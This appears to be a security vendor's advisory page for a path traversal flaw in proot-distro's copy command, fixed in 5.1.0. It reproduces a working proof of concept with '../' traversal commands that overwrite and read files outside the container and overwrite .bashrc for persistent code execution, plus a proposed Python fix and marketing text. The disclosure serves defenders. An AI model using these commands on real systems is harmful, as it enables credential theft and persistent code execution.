GHSA-MFR4-MQ8W-VMG6

GHSA-MFR4-MQ8W-VMG6 is a medium-severity path traversal vulnerability in proot-distro (pip), affecting versions < 5.1.0. It is fixed in 5.1.0.

Does this CVE actually affect you?

Kodem shows which CVEs are reachable and running in your applications, so you fix what's exploitable, not just what's listed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence, not another scanner.

Summary

PRoot-Distro has Path Traversal in proot-distro copy, Arbitrary Read, Write, and Persistent Code Execution Outside Container Rootfs

Path Traversal in proot-distro copy, Arbitrary Read, Write, and Persistent Code Execution Outside Container Rootfs

Repository

https://github.com/termux/proot-distro

Maintainer: @sylirre

Affected Component

  • Package: proot-distro
  • Affected command: copy
  • Attack surface: Host-side Termux CLI, this is not a guest distro shell issue
  • Vulnerability type: Path Traversal (CWE-22)

Affected Versions

Component Version
proot-distro 4.38.0 (initially discovered), 5.0.2 (confirmed still affected, tested on 2026-05-19)
Test distro Ubuntu 25.10 "Questing Quokka" (ubuntu alias)
Architecture aarch64
Device Samsung A23
Package source https://packages-cf.termux.dev/apt/termux-main stable/main aarch64

Proof of Concept

All tests were performed using only self-owned files and harmless marker data. No root was used. No third-party data was involved. The .bashrc overwritten during testing was immediately restored.

Step 1, Setup

rm -rf ~/poc
mkdir -p ~/poc

Step 2, Arbitrary write (overwrite a file outside the container rootfs)

echo "ORIGINAL" > ~/poc/target.txt
echo "PWNED_BY_PROOT_DISTRO" > ~/poc/evil.txt

proot-distro copy
~/poc/evil.txt
"ubuntu:$(printf '../%.0s' {1..20})data/data/com.termux/files/home/poc/target.txt"

Observed output:

[*] Source: '/data/data/com.termux/files/home/poc/evil.txt'
[*] Destination: '/data/data/com.termux/files/home/poc/target.txt'
[*] Copying files, this may take a while...
[*] Finished copying files.

Verification:

cat ~/poc/target.txt
→ PWNED_BY_PROOT_DISTRO

This confirms that the destination resolved to a path outside the container rootfs and the file was overwritten successfully.

Step 3, Arbitrary read (exfiltrate a file from outside the container rootfs)

echo "TOP_SECRET" > ~/poc/secret.txt

proot-distro copy
"ubuntu:$(printf '../%.0s' {1..20})data/data/com.termux/files/home/poc/secret.txt"
~/poc/read_result.txt

Observed output:

[*] Source: '/data/data/com.termux/files/home/poc/secret.txt'
[*] Destination: '/data/data/com.termux/files/home/poc/read_result.txt'
[*] Copying files, this may take a while...
[*] Finished copying files.

Verification:

cat ~/poc/read_result.txt
→ TOP_SECRET

This confirms that the source path resolved to a file outside the container rootfs and its contents were successfully copied to a host-side destination.

Step 4, Persistent code execution via .bashrc overwrite

printf 'echo VULN_TRIGGERED > ~/poc/proof.txt\n' > ~/poc/payload.sh

proot-distro copy ~/poc/payload.sh
"ubuntu:$(printf '../%.0s' {1..20})data/data/com.termux/files/home/.bashrc"

Observed output:

[*] Source: '/data/data/com.termux/files/home/poc/payload.sh'
[*] Destination: '/data/data/com.termux/files/home/.bashrc'
[*] Copying files, this may take a while...
[*] Finished copying files.

Verification before restart:

cat ~/.bashrc
→
echo VULN_TRIGGERED > ~/poc/proof.txt

After closing and reopening Termux, the new shell sourced .bashrc and executed the payload automatically:

cat ~/poc/proof.txt
→ VULN_TRIGGERED

This confirms that attacker-controlled content written into .bashrc executes automatically on the next shell launch, resulting in persistent local code execution within the Termux app context.

Attack Scenario

The most realistic exploitation path is a confused deputy scenario: a community script, Termux plugin, or automated tool calls proot-distro copy with a path derived from untrusted input. The attacker supplies a crafted container path. The tool resolves it to a host-side location and reads or writes the file without any boundary check. The user sees normal command output and no indication that a file outside the container was touched.

On a real device with SSH keys or stored credentials in the Termux home directory, the read primitive allows silent credential theft. The write primitive to .bashrc allows persistent code execution triggered on next login.

Proposed Fix

After resolving the container-relative path, verify that the canonical result remains inside the container rootfs before allowing any read or write operation. Example mitigation pattern in Python:

import os

def safe_resolve(rootfs, container_path):
candidate = os.path.realpath(os.path.join(rootfs, container_path.lstrip('/')))
root = os.path.realpath(rootfs)
if candidate != root and not candidate.startswith(root + os.sep):
raise ValueError("path traversal detected: resolved path escapes rootfs")
return candidate

This check must be applied to both the source and destination paths in the copy subcommand.

Additional Notes

  • This issue was reproduced on the official Termux release from https://packages-cf.termux.dev, not a fork.
  • No root access was used at any point during testing.
  • All test files were self-owned and contained only harmless marker data.
  • The .bashrc overwritten during testing was immediately restored after verification.

Impact

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

GHSA-MFR4-MQ8W-VMG6 has a CVSS score of 6.6 (Medium). The vector is requires local access, low privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (5.1.0); upgrading removes the vulnerable code path.

Affected versions

proot-distro (< 5.1.0)

Security releases

proot-distro → 5.1.0 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

Upgrade proot-distro to 5.1.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is GHSA-MFR4-MQ8W-VMG6? GHSA-MFR4-MQ8W-VMG6 is a medium-severity path traversal vulnerability in proot-distro (pip), affecting versions < 5.1.0. It is fixed in 5.1.0. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is GHSA-MFR4-MQ8W-VMG6? GHSA-MFR4-MQ8W-VMG6 has a CVSS score of 6.6 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of proot-distro are affected by GHSA-MFR4-MQ8W-VMG6? proot-distro (pip) versions < 5.1.0 is affected.
  4. Is there a fix for GHSA-MFR4-MQ8W-VMG6? Yes. GHSA-MFR4-MQ8W-VMG6 is fixed in 5.1.0. Upgrade to this version or later.
  5. Is GHSA-MFR4-MQ8W-VMG6 exploitable, and should I be worried? Whether GHSA-MFR4-MQ8W-VMG6 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether GHSA-MFR4-MQ8W-VMG6 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix GHSA-MFR4-MQ8W-VMG6? Upgrade proot-distro to 5.1.0 or later.

Stop the waste.
Protect your environment with Kodem.